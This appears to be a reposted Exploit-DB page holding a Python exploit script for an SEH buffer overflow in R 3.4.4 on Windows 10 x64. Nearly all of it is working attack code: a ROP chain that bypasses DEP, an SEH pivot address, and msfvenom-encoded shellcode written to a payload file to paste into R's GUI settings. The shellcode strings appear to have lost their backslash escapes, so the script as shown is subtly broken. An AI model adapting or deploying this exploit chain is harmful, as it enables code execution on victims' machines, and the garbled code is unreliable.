Exploit/Advisories

Published on July 16th, 2019 📆 | 2689 Views ⚑

0

R 3.4.4 (Windows 10 x64)


iSpeech.org

#!/usr/bin/python
# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow  SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www.r-project.org/
# Tested on: Windows 10 Home Single Language 64-bit
# Social: https://twitter.com/blackleitus
# Website: https://skybulk.github.io/
# discovered by: bzyo


# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
import struct 

outfile = 'payload.txt'

def create_rop_chain():
    rop_gadgets = [
       0x6c998f58,   # POP EAX # RETN [R.dll] 
       0x6379973c,   # ptr to &VirtualProtect() [IAT methods.dll]
       0x6fee2984,   # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 
       0x6ca1ba76,   # XCHG EAX,ESI # RETN [R.dll] 
       0x64c45cb8,   # POP ECX # RETN    ** [methods.dll] **   |   {PAGE_EXECUTE_READ}
       0x64c46010,   # &Writable location [methods.dll]
       0x6cacc7e2,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0xffffffc0,   # Value to negate, will become 0x00000040
       0x7139c7ba,   # NEG EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
       0x6ca3485a,   # XCHG EAX,EDX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x7135a862,   # POP EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
       0xfffffdff,   # Value to negate, will become 0x00000201
       0x6e7d41ca,   # NEG EAX # RETN    ** [utils.dll] **   |   {PAGE_EXECUTE_READ}
       0x63742597,   # XCHG EAX,EBX # RETN    ** [Rgraphapp.dll] **   |   {PAGE_EXECUTE_READ}
       0x6cbef3c0,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x41414141,   # Filler (compensate)
       0x6c9b1de7,   # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x6ca2a9bd,   # & jmp esp [R.dll]
       0x6cbebfa6,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x90909090,   # nop
       0x6ca00e93,   # POP EDI # RETN [R.dll] 
       0x6375fe5c,   # RETN (ROP NOP) [Rgraphapp.dll]
       0x6ff1b7bb,   # PUSHAD # RETN [grDevices.dll]
    ]

    return ''.join(struct.pack('<i ', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

junk = "A" * 1016

seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} :  # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b 'x00x09x0ax0d' cmd=calc.exe exitfunc=thread -f python

nops = struct.pack("<L", 0x6cacc7e3) * 30

shellcode =  ""
shellcode += "x90" * 20
shellcode += "xdbxcexbfx90x28x2fx09xd9x74x24xf4x5dx29"
shellcode += "xc9xb1x31x31x7dx18x83xc5x04x03x7dx84xca"
shellcode += "xdaxf5x4cx88x25x06x8cxedxacxe3xbdx2dxca"
shellcode += "x60xedx9dx98x25x01x55xccxddx92x1bxd9xd2"
shellcode += "x13x91x3fxdcxa4x8ax7cx7fx26xd1x50x5fx17"
shellcode += "x1axa5x9ex50x47x44xf2x09x03xfbxe3x3ex59"
shellcode += "xc0x88x0cx4fx40x6cxc4x6ex61x23x5fx29xa1"
shellcode += "xc5x8cx41xe8xddxd1x6cxa2x56x21x1ax35xbf"
shellcode += "x78xe3x9axfexb5x16xe2xc7x71xc9x91x31x82"
shellcode += "x74xa2x85xf9xa2x27x1ex59x20x9fxfax58xe5"
shellcode += "x46x88x56x42x0cxd6x7ax55xc1x6cx86xdexe4"
shellcode += "xa2x0fxa4xc2x66x54x7ex6ax3ex30xd1x93x20"
shellcode += "x9bx8ex31x2ax31xdax4bx71x5fx1dxd9x0fx2d"
shellcode += "x1dxe1x0fx01x76xd0x84xcex01xedx4exabxee"
shellcode += "x0fx5bxc1x86x89x0ex68xcbx29xe5xaexf2xa9"
shellcode += "x0cx4ex01xb1x64x4bx4dx75x94x21xdex10x9a"
shellcode += "x96xdfx30xf9x79x4cxd8xd0x1cxf4x7bx2d"

padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))

payload = junk + seh + nops + rop_chain + shellcode + padding

with open(outfile, 'w') as file:
  file.write(payload)
print "payload File Createdn"
            





https://www.exploit-db.com/exploits/47122

Tagged with:



Comments are closed.